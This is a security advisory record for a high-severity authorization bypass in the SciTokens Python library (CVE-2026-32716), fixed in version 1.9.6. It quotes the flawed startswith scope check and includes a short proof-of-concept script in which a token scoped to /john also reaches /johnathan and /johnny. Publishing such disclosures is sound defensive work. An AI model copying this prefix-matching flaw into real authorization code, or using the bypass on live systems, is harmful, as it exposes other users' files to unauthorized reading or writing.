{"id":"GHSA-w8fp-g9rh-34jh","summary":"SciTokens has an Authorization Bypass via Incorrect Scope Path Prefix Checking","details":"### Summary\nThe `Enforcer` incorrectly validates scope paths by using a simple prefix match (`startswith`). This allows a token with access to a specific path (e.g., `/john`) to also access sibling paths that start with the same prefix (e.g., `/johnathan`, `/johnny`), which is an **Authorization Bypass**.\n\n### Details\n**File:** `src/scitokens/scitokens.py`  \n**Methods:** `_validate_scp` and `_validate_scope`\n\n### Vulnerable Code Snippets:\n\n**In `_validate_scp` (around line 696):**\n```python\n    for scope in value:\n        authz, norm_path = self._check_scope(scope)\n        if (self._test_authz == authz) and norm_requested_path.startswith(norm_path):\n            return True\n```\n\n**In `_validate_scope` (around line 722):**\n```python\n    for scope in value.split(\" \"):\n        authz, norm_path = self._check_scope(scope)\n        if (self._test_authz == authz) and norm_requested_path.startswith(norm_path):\n            return True\n```\n\nIf `norm_path` (authorized) is `/john` and `norm_requested_path` (requested) is `/johnathan`, `startswith` returns `True`, incorrectly granting access.\n\n### PoC\n```\n\nimport scitokens\nimport sys\n\ndef poc_scope_bypass():\n    \"\"\"\n    Demonstrate an Authorization Bypass vulnerability in scope path checking.\n    \"\"\"\n    print(\"--- PoC: Incorrect Scope Path Checking (Authorization Bypass) ---\")\n    \n    issuer = \"https://scitokens.org/unittest\"\n    enforcer = scitokens.Enforcer(issuer)\n    \n    # Create a token with access to /john\n    token = scitokens.SciToken()\n    token['iss'] = issuer\n    token['scope'] = \"read:/john\"\n    \n    print(f\"Authorized path in scope: /john\")\n    \n    # 1. Test access to /john/file (should be allowed)\n    print(f\"[1] Testing legitimate subpath: /john/file\")\n    if enforcer.test(token, 'read', '/john/file'):\n        print(\"    -\u003e Access GRANTED (Correct behavior)\")\n    else:\n        print(\"    -\u003e Access DENIED (Incorrect behavior - should have access to subpaths)\")\n\n    # 2. Test access to /johnathan (SHOULD BE DENIED)\n    print(f\"[2] Testing illegitimate sibling path: /johnathan\")\n    if enforcer.test(token, 'read', '/johnathan'):\n        print(\"    -\u003e [VULNERABILITY] Access GRANTED! This is an authorization bypass.\")\n    else:\n        print(\"    -\u003e Access DENIED (Correct behavior - fix is working)\")\n\n    # 3. Test access to /johnny (SHOULD BE DENIED)\n    print(f\"[3] Testing illegitimate sibling path: /johnny\")\n    if enforcer.test(token, 'read', '/johnny'):\n        print(\"    -\u003e [VULNERABILITY] Access GRANTED! This is an authorization bypass.\")\n    else:\n        print(\"    -\u003e Access DENIED (Correct behavior - fix is working)\")\n\nif __name__ == \"__main__\":\n    # Ensure scitokens from src/ is available\n    sys.path.insert(0, \"src\")\n    poc_scope_bypass()\n\n```\n### Impact\nThis bug allows a user to access resources they are not authorized for. For example, if a system uses usernames as top-level directories in a shared storage, a user `john` might be able to read or write to the directory of user `johnathan` simply because their names share a prefix.","aliases":["CVE-2026-32716","PYSEC-2026-2276"],"modified":"2026-07-13T07:26:51.235264032Z","published":"2026-03-31T22:51:03Z","database_specific":{"github_reviewed_at":"2026-03-31T22:51:03Z","nvd_published_at":"2026-03-31T03:15:57Z","cwe_ids":["CWE-285"],"severity":"HIGH","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/scitokens/scitokens/security/advisories/GHSA-w8fp-g9rh-34jh"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32716"},{"type":"WEB","url":"https://github.com/scitokens/scitokens/commit/7a237c0f642efb9e8c36ac564b745895cca83583"},{"type":"PACKAGE","url":"https://github.com/scitokens/scitokens"},{"type":"WEB","url":"https://github.com/scitokens/scitokens/releases/tag/v1.9.6"}],"affected":[{"package":{"name":"scitokens","ecosystem":"PyPI","purl":"pkg:pypi/scitokens"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"1.9.6"}]}],"versions":["0.1","0.1.1","0.1.3","0.1.4","0.1.5","0.1.6","0.2.1","0.2.2","0.3.0","0.3.1","0.3.2","0.3.3","1.0.0","1.0.1","1.0.2","1.1.0","1.1.1","1.2.0","1.2.1","1.2.2","1.2.4","1.3.1","1.4.0","1.5.0","1.6.0","1.6.2","1.7.0","1.7.1","1.7.2","1.7.4","1.8.0","1.8.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-w8fp-g9rh-34jh/GHSA-w8fp-g9rh-34jh.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"}]}